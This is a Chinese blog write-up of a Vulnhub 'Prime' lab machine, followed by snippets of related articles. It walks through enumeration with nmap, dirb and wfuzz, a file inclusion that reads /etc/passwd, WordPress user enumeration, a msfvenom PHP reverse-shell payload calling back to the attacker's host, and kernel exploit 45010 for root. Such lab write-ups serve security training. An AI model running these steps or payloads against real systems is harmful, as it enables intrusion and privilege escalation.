prime靶机CVE-2017-16695复现

已于 2023-08-15 20:10:59 修改
阅读量2.2k 收藏
点赞数
文章标签: 网络安全
于 2022-04-18 21:49:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51625802/article/details/124259996
版权

prime靶机cve-45010复现

  • 前期准备

使用nmap -sP 192.168.136.1/24

找出这台靶机的ip:192.168.136.128

本机ip:192.168.136.129

  • 扫描目录

dirb 192.168.136.128

记住扫到的这个网站先留个伏笔

dirb 192.168.136.128 -X .php,.txt,.zip

扫出俩php网站和一个提示网站

根据提示网站的内容,进行模糊测试

  • wfuzz模糊测试

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.136.128/image.php?FUZZ

发现很多都是7行12个单词136个字符串,那我们过滤一下

过滤的参数

hc:状态码

hl:行

hw:单词

hh:字符数

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hl 6 http://192.168.136.128/image.php?FUZZ

打开这个网页

然后再根据提示网站上的location.txt尝试

得到

所以我们可以到扫到的另外一个网站下尝试

说明secrettier360是一个可控的参数

  • 文件包含

我们来看看家常便饭的/etc/passwd哈哈哈

在这看不方便,到kali上用curl命令查看

curl http://192.168.136.128/image.php?secrettier360=/etc/passwd

发现倒数第三行很可疑有个password.txt

http://192.168.136.128/image.php?secrettier360=/home/saket/password.txt

发现了个密码

尝试进入靶机,发现不是

根据之前的

猜测可能是这个网站内部用户的密码

有了密码,那用户呢?

  • 找此网站下的用户

用cmseek -u http://192.168.136.128/wordpress/扫描

没扫出,尬住,换一个工具

wpscan --url http://192.168.136.128/wordpress --enumerate u

发现了个用户名,这网站也只有这一个用户,尝试登陆

登陆成功进入了后台

找到了个php可以写码

  • 利用msfconsole生成一个php的payload

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.136.129 LPORT=9999 -o payload.php

然后打开msf的监听

开始监听

然后在网上搜索主题路径位置或者自行搭建wordpress的网站找到该写码的路径

监听成功

由于用户权限的限制接下来尝试提权

  • 提权操作

用msf搜索这个版本有没有可利用漏洞

searchsploit Ubuntu 16.04

找到个可以利用的漏洞

用gcc命令编译成可执行程序

然后用meterpreter的upload命令将木马传到被攻击机上

upload /root/45010 /tmp/45010

传到/tmp目录是因为tmp目录任意一个用户都能有读写权限

进入shell

提权成功

进入root目录下

找到flag

SheenStars
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2019-2725:WebLogic不安全反序列化-CVE-2019-2725有效负载生成器和漏洞利用
04-25
CVE-2019-2725 WebLogic Universal Exploit-CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729有效负载生成器和利用信息/帮助$ python3 weblogic_exploit.py -h====================================...
DirtyCow提权漏洞CVE-2016-5195)1
08-08
脏牛(Dirty Cow)漏洞,全称为“竞争条件写入时制”(Copy-on-Write Race Condition),在2016年被发,其安全漏洞编号为CVE-2016-5195。这个漏洞主要影响的是Linux内核,特别是从2007年的2.6.22版本到修前的...
墨者 Linux 提权命令 CVE-2017-16695
weixin_45498459的博客
05-18 224
通过xftp传输文件 可以通过地址 url 下载 然后在xftp传输进入 使用gcc -o 参数 进行c文件编写 ./名称 为运行文件 如果提示权限不够 chmod +x 名称 查看key.txt 获得
Prime靶场
wcl20010的博客
05-02 472
prime靶场(vulnhub) 靶场地址:链接:https://pan.baidu.com/s/1jsccNmrmhG2dPuaz6zGwmA 提取码:ap5g 目录 X shell 连接 kali: #首先查看kali是否打开了22端口。ssh协议:ssh远程连接 netstat -an|grep 22 #打开服务 service ssh start 1. 主机发: #采用nmap nmap -sP 192.168.128.1/24 #直接对128这个网段进行扫描,-sP代表只进行p
红队靶场之prime1靶机思路,wordpress反弹shell,shell执行ubuntu内核提权
最新发布
m0_58116751的博客
05-18 1540
OK,我们看到目录扫描完毕,我们大致扫一眼就能看到里面最敏感的我认为就是/wordpress/w-admin 我们在做渗透测试的时候需要有一定的嗅觉,结合我们之前在nmap脚本扫描中确实看到了wordpress的个平台那么这个目录90%就是他的登录界面了然后还有几个可疑目录。我们猜想是正确的,我们简单尝试几个弱口令,都失败了进不去,那没有办法,我们暂且将他搁置,我们去看下背的目录,看能不能找到一些别的信息。我们去image看下。我们看到他的默认页面是kali的图片,看一眼源码也没有发什么可以利用的东西。
Prime(wfuzz模糊测试,CVE-2017-16695)
m0_66299232的博客
10-19 294
2.访问secret.txt ,有一个location.txt文件,并且 它让访问一个github地址。13.制我的php-reverse-shell.php(github里有)文件的代码,进行保存。8.下载下来给个执行权限,运行后就是root权限,进入root目录,成功拿下!7.访问/etc/passwd文件,在最下面说找到password.txt。2.用find命令查找有suid执行权限的文件,没有利用信息。wfuzz模糊测试,CVE-2017-16695,内核漏洞提权
靶机-primel
qq_45751902的博客
10-18 1262
靶机primel系统:ubuntu没有密码,没有ip,nat模式攻击机:kali目标:获得root的flag。
Vulnhub靶机PRIME_ 1
LainWith的博客
12-10 606
Prime(此系列共1台)发布日期:2019年9月1日难度:初-中运行环境:VMware Workstation目标:取得 root 权限 + Flag主机发端口扫描+漏洞扫描目录爆破文件扩展名爆破强制访问文件包含漏洞WordPress利用内核提权。
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发、端口扫描、服务版本识别等相关技术。 主机发靶机实战中,主机发是指通过各种技术手段来发目标网络中...
E041-服务漏洞利用及加固-利用CVE-2018-4878漏洞上传实远程控制.pdf
12-02
该课程主要讲解了如何利用CVE-2018-4878漏洞进行服务漏洞利用和加固。CVE-2018-4878是一个Adobe Flash Player的安全漏洞,允许攻击者通过特制的SWF文件执行任意代码,从而实远程控制目标系统。此过程分为多个步骤...
渗透测试怎么搭建靶机_渗透测试实战——prime靶机入侵
weixin_39857876的博客
11-21 335
原创:safe6合天智汇原创投稿活动:http://link.zhihu.com/?target=https%3A//mp.weixin.qq.com/s/Nw2VDyvCpPt_GG5YKTQuUQIp:192.168.0.115Kali:192.168.0.21安装好的靶机界面​Nmap扫描端口【注:Nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。Nmap扫描相关的信息可以...
Vulnhub靶机 Prime_Series_Level-1
菜浪马废的博客
04-29 836
换一个参数 secrettier360 返回结果太多 过滤一下 ??? 觉得自己被耍了 这不是saket的密码 我吐了 是victor的 我*****他的 连接成功 以为突破口是env 最后还是内核提权 我用的最后一个漏洞 先在kali上编译 gcc -o poc 45010.c 然后传到靶机上 直接运行 Vulnhub就打到这吧 主要是还要下载 太麻烦了...
【学渗透靶机——prime
jieli0901227的博客
05-13 247
提示使用secrettier360作为参数在每一个php 页面,有参数没有值,那我们就在index.php 和image.php 上测试文件包含漏洞。这台靶机开放端口 22 80 端口 使用nmap 扫描只有枚举的信息, 22 端口也没有账密信息 ,所以重点放在80端口上。接下来直接拿webshell,打开我们最喜欢的主题编辑器,翻了半天,只有secret.php 存在写权限,写入反弹shell。页面提示我挖错文件了,,那就尝试读取location.txt.,如下图。查看enc 文件 无读权限。
Vulnhub靶场Prime_Series_Level-1渗透
m0_65712192的博客
02-12 1616
Vulnhub靶场Prime_Series_Level-1渗透
cve N/A(靶机环境Ubuntu18.04)
ckm1607011的博客
04-12 357
此exp来源:https://www.exploit-db.com/exploits/46942 其实这个exp在Linux环境下也可以成功,只不过需要改一下从官网下载的源码; 源码第62行,可以看到最后一项是Windows系统下的路径表示方式,需要改成Linux系统下的对应路径 OptString.new('DefaultOatsPath', [true, 'The default ...
prime1靶场渗透
weixin_73562787的博客
07-18 247
靶场练习,详细全过程,prime1.0靶场
Vulnhub | 实战靶场渗透测试 - PRIME: 1
尼泊罗河伯的博客
06-01 1643
这台机器是为那些试图准备 OSCP 或 OSCP 考试的人设计的。这是素数系列的第一级。在每个阶段都会提供一些帮助。机器很长,因为 OSCP 和黑客的机器是设计的。因此,您有一个获取根标志和用户标志的目标。如果卡在某个点上,则会在枚举级别上提供一些帮助。
搭建WebLogic12.2.1.3.0(CVE_2018_2894 漏洞)的靶机
qq_44262210的博客
05-08 548
安装配置JDK环境变量,安装配置WebLogic12,开放7001端口
cve-2018-2628
08-15
- *1* *3* [weblogic CVE-2018-2628](https://blog.csdn.net/qq_32731075/article/details/117933244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值